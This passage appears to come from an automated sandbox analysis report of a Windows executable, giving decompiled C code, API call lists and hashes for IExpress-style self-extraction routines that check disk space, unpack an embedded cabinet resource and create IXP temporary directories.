                                                                                                                                                                                                                                                						_t110 = 0x4c5;
                                                                                                                                                                                                                                                						E010E44B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                						goto L31;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					memset( &_v788, 0, 0x200);
                                                                                                                                                                                                                                                					 *0x10e9124 = E010E6285();
                                                                                                                                                                                                                                                					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                                                                					_t110 = 0x4f9;
                                                                                                                                                                                                                                                					goto L30;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_t110 = 0x4bc;
                                                                                                                                                                                                                                                					E010E44B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                					 *0x10e9124 = E010E6285();
                                                                                                                                                                                                                                                					_t66 = 0;
                                                                                                                                                                                                                                                					L33:
                                                                                                                                                                                                                                                					return E010E6CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                			}

                                                                                                                                                                                                                                                0x010e5b6f
                                                                                                                                                                                                                                                0x010e5b72
                                                                                                                                                                                                                                                0x010e5b72
                                                                                                                                                                                                                                                0x010e5b85
                                                                                                                                                                                                                                                0x010e5b98
                                                                                                                                                                                                                                                0x010e5b9e
                                                                                                                                                                                                                                                0x010e5b87
                                                                                                                                                                                                                                                0x010e5b8f
                                                                                                                                                                                                                                                0x010e5b8f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5b85
                                                                                                                                                                                                                                                0x010e5b29
                                                                                                                                                                                                                                                0x010e5b33
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5b35
                                                                                                                                                                                                                                                0x010e5b48
                                                                                                                                                                                                                                                0x010e5b4a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5b4a
                                                                                                                                                                                                                                                0x010e5b0f
                                                                                                                                                                                                                                                0x010e5b16
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5b16
                                                                                                                                                                                                                                                0x010e5a7c
                                                                                                                                                                                                                                                0x010e5a8a
                                                                                                                                                                                                                                                0x010e5aa5
                                                                                                                                                                                                                                                0x010e5aab
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e59bb
                                                                                                                                                                                                                                                0x010e59c0
                                                                                                                                                                                                                                                0x010e59c7
                                                                                                                                                                                                                                                0x010e59d1
                                                                                                                                                                                                                                                0x010e59d6
                                                                                                                                                                                                                                                0x010e5c05
                                                                                                                                                                                                                                                0x010e5c14
                                                                                                                                                                                                                                                0x010e5c14

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 010E59A8
                                                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNELBASE(?), ref: 010E59AF
                                                                                                                                                                                                                                                • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 010E5A13
                                                                                                                                                                                                                                                • MulDiv.KERNEL32(?,?,00000400), ref: 010E5A40
                                                                                                                                                                                                                                                • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 010E5A64
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 010E5A7C
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 010E5A98
                                                                                                                                                                                                                                                • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 010E5AA5
                                                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 010E5BFC
                                                                                                                                                                                                                                                  • Part of subcall function 010E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010E4518
                                                                                                                                                                                                                                                  • Part of subcall function 010E44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 010E4554
                                                                                                                                                                                                                                                  • Part of subcall function 010E6285: GetLastError.KERNEL32(010E5BBC), ref: 010E6285
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4237285672-0
                                                                                                                                                                                                                                                • Opcode ID: 54978a5681cc419ada37a4211a6070477243edd0bccdbf3f72e4aae2af9047f7
                                                                                                                                                                                                                                                • Instruction ID: 3da3caed5f4dc38d7667c7415ca2ac04e95bcd7a75a8e9d7d9878658bc68f61b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 54978a5681cc419ada37a4211a6070477243edd0bccdbf3f72e4aae2af9047f7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3071B5B5A0020C9FEB65DB66CC88BFB77EDEB48748F0444A9F585D7144DA358E848F60
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                control_flow_graph 374 10e4fe0-10e501a call 10e468f FindResourceA LoadResource LockResource 377 10e5020-10e5027 374->377 378 10e5161-10e5163 374->378 379 10e5029-10e5051 GetDlgItem ShowWindow GetDlgItem ShowWindow 377->379 380 10e5057-10e505e call 10e4efd 377->380 379->380 383 10e507c-10e50b4 380->383 384 10e5060-10e5077 call 10e44b9 380->384 389 10e50e8-10e5104 call 10e44b9 383->389 390 10e50b6-10e50da 383->390 388 10e5107-10e510e 384->388 392 10e511d-10e511f 388->392 393 10e5110-10e5117 FreeResource 388->393 398 10e5106 389->398 390->398 402 10e50dc 390->402 395 10e513a-10e5141 392->395 396 10e5121-10e5127 392->396 393->392 400 10e515f 395->400 401 10e5143-10e514a 395->401 396->395 399 10e5129-10e5135 call 10e44b9 396->399 398->388 399->395 400->378 401->400 404 10e514c-10e5159 SendMessageA 401->404 405 10e50e3-10e50e6 402->405 404->400 405->389 405->398
                                                                                                                                                                                                                                                C-Code - Quality: 77%
                                                                                                                                                                                                                                                			E010E4FE0(void* __edi, void* __eflags) {
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* _t8;
                                                                                                                                                                                                                                                				struct HWND__* _t9;
                                                                                                                                                                                                                                                				int _t10;
                                                                                                                                                                                                                                                				void* _t12;
                                                                                                                                                                                                                                                				struct HWND__* _t24;
                                                                                                                                                                                                                                                				struct HWND__* _t27;
                                                                                                                                                                                                                                                				intOrPtr _t29;
                                                                                                                                                                                                                                                				void* _t33;
                                                                                                                                                                                                                                                				int _t34;
                                                                                                                                                                                                                                                				CHAR* _t36;
                                                                                                                                                                                                                                                				int _t37;
                                                                                                                                                                                                                                                				intOrPtr _t47;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t33 = __edi;
                                                                                                                                                                                                                                                				_t36 = "CABINET";
                                                                                                                                                                                                                                                				 *0x10e9144 = E010E468F(_t36, 0, 0);
                                                                                                                                                                                                                                                				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                                                                                                                                                                                                				 *0x10e9140 = _t8;
                                                                                                                                                                                                                                                				if(_t8 == 0) {
                                                                                                                                                                                                                                                					return _t8;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t9 =  *0x10e8584; // 0x0
                                                                                                                                                                                                                                                				if(_t9 != 0) {
                                                                                                                                                                                                                                                					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                                                                                                                                                                                                					ShowWindow(GetDlgItem( *0x10e8584, 0x841), 5); // executed
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t10 = E010E4EFD(0, 0); // executed
                                                                                                                                                                                                                                                				if(_t10 != 0) {
                                                                                                                                                                                                                                                					__imp__#20(E010E4CA0, E010E4CC0, E010E4980, E010E4A50, E010E4AD0, E010E4B60, E010E4BC0, 1, 0x10e9148, _t33);
                                                                                                                                                                                                                                                					_t34 = _t10;
                                                                                                                                                                                                                                                					if(_t34 == 0) {
                                                                                                                                                                                                                                                						L8:
                                                                                                                                                                                                                                                						_t29 =  *0x10e9148; // 0x0
                                                                                                                                                                                                                                                						_t24 =  *0x10e8584; // 0x0
                                                                                                                                                                                                                                                						E010E44B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                						_t37 = 0;
                                                                                                                                                                                                                                                						L9:
                                                                                                                                                                                                                                                						goto L10;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					__imp__#22(_t34, "*MEMCAB", 0x10e1140, 0, E010E4CD0, 0, 0x10e9140); // executed
                                                                                                                                                                                                                                                					_t37 = _t10;
                                                                                                                                                                                                                                                					if(_t37 == 0) {
                                                                                                                                                                                                                                                						goto L9;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					__imp__#23(_t34); // executed
                                                                                                                                                                                                                                                					if(_t10 != 0) {
                                                                                                                                                                                                                                                						goto L9;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					goto L8;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_t27 =  *0x10e8584; // 0x0
                                                                                                                                                                                                                                                					E010E44B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                					_t37 = 0;
                                                                                                                                                                                                                                                					L10:
                                                                                                                                                                                                                                                					_t12 =  *0x10e9140; // 0x0
                                                                                                                                                                                                                                                					if(_t12 != 0) {
                                                                                                                                                                                                                                                						FreeResource(_t12);
                                                                                                                                                                                                                                                						 *0x10e9140 = 0;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					if(_t37 == 0) {
                                                                                                                                                                                                                                                						_t47 =  *0x10e91d8; // 0x0
                                                                                                                                                                                                                                                						if(_t47 == 0) {
                                                                                                                                                                                                                                                							E010E44B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					if(( *0x10e8a38 & 0x00000001) == 0 && ( *0x10e9a34 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                						SendMessageA( *0x10e8584, 0xfa1, _t37, 0);
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					return _t37;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                			}

















                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46A0
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: SizeofResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46A9
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46C3
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: LoadResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46CC
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: LockResource.KERNEL32(00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46D3
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: memcpy_s.MSVCRT ref: 010E46E5
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46EF
                                                                                                                                                                                                                                                • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 010E4FFE
                                                                                                                                                                                                                                                • LoadResource.KERNEL32(00000000,00000000), ref: 010E5006
                                                                                                                                                                                                                                                • LockResource.KERNEL32(00000000), ref: 010E500D
                                                                                                                                                                                                                                                • GetDlgItem.USER32(00000000,00000842), ref: 010E5030
                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 010E5037
                                                                                                                                                                                                                                                • GetDlgItem.USER32(00000841,00000005), ref: 010E504A
                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 010E5051
                                                                                                                                                                                                                                                • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 010E5111
                                                                                                                                                                                                                                                • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 010E5159
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
• Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                                                                • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                                                                • API String ID: 1305606123-2642027498
                                                                                                                                                                                                                                                • Opcode ID: a2d4346a6d91ca0371768221d2c1031d5c1bd9bafa0f57097448dc0cf3f1a3b7
                                                                                                                                                                                                                                                • Instruction ID: b10cefb49644ed1464e62d32c7085b0d69ad4a2bf1db456079051dc8e20a4939
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a2d4346a6d91ca0371768221d2c1031d5c1bd9bafa0f57097448dc0cf3f1a3b7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3031E6B5740301AFE7305A67AD8DF663ADCA708F59F0444ADB9C1EE149DA7ECC008760
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                C-Code - Quality: 95%
                                                                                                                                                                                                                                                			E010E53A1(CHAR* __ecx, CHAR* __edx) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t5;
                                                                                                                                                                                                                                                				long _t13;
                                                                                                                                                                                                                                                				int _t14;
                                                                                                                                                                                                                                                				CHAR* _t20;
                                                                                                                                                                                                                                                				int _t29;
                                                                                                                                                                                                                                                				int _t30;
                                                                                                                                                                                                                                                				CHAR* _t32;
                                                                                                                                                                                                                                                				signed int _t33;
                                                                                                                                                                                                                                                				void* _t34;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t5 =  *0x10e8004; // 0x71a8563c
                                                                                                                                                                                                                                                				_v8 = _t5 ^ _t33;
                                                                                                                                                                                                                                                				_t32 = __edx;
                                                                                                                                                                                                                                                				_t20 = __ecx;
                                                                                                                                                                                                                                                				_t29 = 0;
                                                                                                                                                                                                                                                				while(1) {
                                                                                                                                                                                                                                                					E010E171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                                                                                                                                                                                                					_t34 = _t34 + 0x10;
                                                                                                                                                                                                                                                					_t29 = _t29 + 1;
                                                                                                                                                                                                                                                					E010E1680(_t32, 0x104, _t20);
                                                                                                                                                                                                                                                					E010E658A(_t32, 0x104,  &_v268); // executed
                                                                                                                                                                                                                                                					RemoveDirectoryA(_t32); // executed
                                                                                                                                                                                                                                                					_t13 = GetFileAttributesA(_t32); // executed
                                                                                                                                                                                                                                                					if(_t13 == 0xffffffff) {
                                                                                                                                                                                                                                                						break;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					if(_t29 < 0x190) {
                                                                                                                                                                                                                                                						continue;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					L3:
                                                                                                                                                                                                                                                					_t30 = 0;
                                                                                                                                                                                                                                                					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                                                                                                                                                                                                						_t30 = 1;
                                                                                                                                                                                                                                                						DeleteFileA(_t32);
                                                                                                                                                                                                                                                						CreateDirectoryA(_t32, 0);
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					L5:
                                                                                                                                                                                                                                                					return E010E6CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                                                                                                                                                                                                				if(_t14 == 0) {
                                                                                                                                                                                                                                                					goto L3;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t30 = 1;
                                                                                                                                                                                                                                                				 *0x10e8a20 = 1;
                                                                                                                                                                                                                                                				goto L5;
                                                                                                                                                                                                                                                			}


















                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 010E171E: _vsnprintf.MSVCRT ref: 010E1750
                                                                                                                                                                                                                                                • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010E53FB
                                                                                                                                                                                                                                                • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010E5402
                                                                                                                                                                                                                                                • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010E541F
                                                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010E542B
                                                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010E5434
                                                                                                                                                                                                                                                • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010E5452
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                                                                • API String ID: 1082909758-3746127100
                                                                                                                                                                                                                                                • Opcode ID: 0f262f1d7a1493f7273ca7ce618721fd36e24b9dcdea7b91d1d906cb790ec2fa
                                                                                                                                                                                                                                                • Instruction ID: 6a0d9dcecac6b2ca5434bdcc4a162de7b2fdb8969ef20146aeea750450ce180b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0f262f1d7a1493f7273ca7ce618721fd36e24b9dcdea7b91d1d906cb790ec2fa
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0F11E671700104ABE7209A379C4CFEF3AEDEBD5B25F004465B6C697180CE7989428760
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                control_flow_graph 478 10e5467-10e5484 479 10e551c-10e5528 call 10e1680 478->479 480 10e548a-10e5490 call 10e53a1 478->480 484 10e552d-10e5539 call 10e58c8 479->484 483 10e5495-10e5497 480->483 485 10e549d-10e54c0 call 10e1781 483->485 486 10e5581-10e5583 483->486 493 10e554d-10e5552 484->493 494 10e553b-10e5545 CreateDirectoryA 484->494 499 10e550c-10e551a call 10e658a 485->499 500 10e54c2-10e54d8 GetSystemInfo 485->500 489 10e558d-10e559d call 10e6ce0 486->489 497 10e5554-10e5557 call 10e597d 493->497 498 10e5585-10e558b 493->498 495 10e5577-10e557c call 10e6285 494->495 496 10e5547 494->496 495->486 496->493 507 10e555c-10e555e 497->507 498->489 499->484 505 10e54fe 500->505 506 10e54da-10e54dd 500->506 508 10e5503-10e5507 call 10e658a 505->508 511 10e54df-10e54e2 506->511 512 10e54f7-10e54fc 506->512 507->498 515 10e5560-10e5566 507->515 508->499 513 10e54e4-10e54e7 511->513 514 10e54f0-10e54f5 511->514 512->508 513->499 517 10e54e9-10e54ee 513->517 514->508 515->486 518 10e5568-10e5575 RemoveDirectoryA 515->518 517->508 518->486
                                                                                                                                                                                                                                                C-Code - Quality: 75%
                                                                                                                                                                                                                                                			E010E5467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				struct _SYSTEM_INFO _v304;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t10;
                                                                                                                                                                                                                                                				void* _t13;
                                                                                                                                                                                                                                                				intOrPtr _t14;
                                                                                                                                                                                                                                                				void* _t16;
                                                                                                                                                                                                                                                				void* _t20;
                                                                                                                                                                                                                                                				signed int _t26;
                                                                                                                                                                                                                                                				void* _t28;
                                                                                                                                                                                                                                                				void* _t29;
                                                                                                                                                                                                                                                				CHAR* _t48;
                                                                                                                                                                                                                                                				signed int _t49;
                                                                                                                                                                                                                                                				intOrPtr _t61;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t10 =  *0x10e8004; // 0x71a8563c
                                                                                                                                                                                                                                                				_v8 = _t10 ^ _t49;
                                                                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                                                                				if(__edx == 0) {
                                                                                                                                                                                                                                                					_t48 = 0x10e91e4;
                                                                                                                                                                                                                                                					_t42 = 0x104;
                                                                                                                                                                                                                                                					E010E1680(0x10e91e4, 0x104);
                                                                                                                                                                                                                                                					L14:
                                                                                                                                                                                                                                                					_t13 = E010E58C8(_t48); // executed
                                                                                                                                                                                                                                                					if(_t13 != 0) {
                                                                                                                                                                                                                                                						L17:
                                                                                                                                                                                                                                                						_t42 = _a4;
                                                                                                                                                                                                                                                						if(_a4 == 0) {
                                                                                                                                                                                                                                                							L23:
                                                                                                                                                                                                                                                							 *0x10e9124 = 0;
                                                                                                                                                                                                                                                							_t14 = 1;
                                                                                                                                                                                                                                                							L24:
                                                                                                                                                                                                                                                							return E010E6CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t16 = E010E597D(_t48, _t42, 1, 0); // executed
                                                                                                                                                                                                                                                						if(_t16 != 0) {
                                                                                                                                                                                                                                                							goto L23;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t61 =  *0x10e8a20; // 0x0
                                                                                                                                                                                                                                                						if(_t61 != 0) {
                                                                                                                                                                                                                                                							 *0x10e8a20 = 0;
                                                                                                                                                                                                                                                							RemoveDirectoryA(_t48);
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						L22:
                                                                                                                                                                                                                                                						_t14 = 0;
                                                                                                                                                                                                                                                						goto L24;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                                                                                                                                                                                                						 *0x10e9124 = E010E6285();
                                                                                                                                                                                                                                                						goto L22;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					 *0x10e8a20 = 1;
                                                                                                                                                                                                                                                					goto L17;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t42 =  &_v268;
                                                                                                                                                                                                                                                				_t20 = E010E53A1(__ecx,  &_v268); // executed
                                                                                                                                                                                                                                                				if(_t20 == 0) {
                                                                                                                                                                                                                                                					goto L22;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                                                                				_t48 = 0x10e91e4;
                                                                                                                                                                                                                                                				E010E1781(0x10e91e4, 0x104, __ecx,  &_v268);
                                                                                                                                                                                                                                                				if(( *0x10e9a34 & 0x00000020) == 0) {
                                                                                                                                                                                                                                                					L12:
                                                                                                                                                                                                                                                					_t42 = 0x104;
                                                                                                                                                                                                                                                					E010E658A(_t48, 0x104, 0x10e1140);
                                                                                                                                                                                                                                                					goto L14;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				GetSystemInfo( &_v304);
                                                                                                                                                                                                                                                				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                                                                                                                                                                                                				if(_t26 == 0) {
                                                                                                                                                                                                                                                					_push("i386");
                                                                                                                                                                                                                                                					L11:
                                                                                                                                                                                                                                                					E010E658A(_t48, 0x104);
                                                                                                                                                                                                                                                					goto L12;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t28 = _t26 - 1;
                                                                                                                                                                                                                                                				if(_t28 == 0) {
                                                                                                                                                                                                                                                					_push("mips");
                                                                                                                                                                                                                                                					goto L11;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t29 = _t28 - 1;
                                                                                                                                                                                                                                                				if(_t29 == 0) {
                                                                                                                                                                                                                                                					_push("alpha");
                                                                                                                                                                                                                                                					goto L11;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				if(_t29 != 1) {
                                                                                                                                                                                                                                                					goto L12;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_push("ppc");
                                                                                                                                                                                                                                                				goto L11;
                                                                                                                                                                                                                                                			}





















                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010E54C9
                                                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010E553D
                                                                                                                                                                                                                                                • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010E556F
                                                                                                                                                                                                                                                  • Part of subcall function 010E53A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010E53FB
                                                                                                                                                                                                                                                  • Part of subcall function 010E53A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010E5402
                                                                                                                                                                                                                                                  • Part of subcall function 010E53A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010E541F
                                                                                                                                                                                                                                                  • Part of subcall function 010E53A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010E542B
                                                                                                                                                                                                                                                  • Part of subcall function 010E53A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010E5434
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
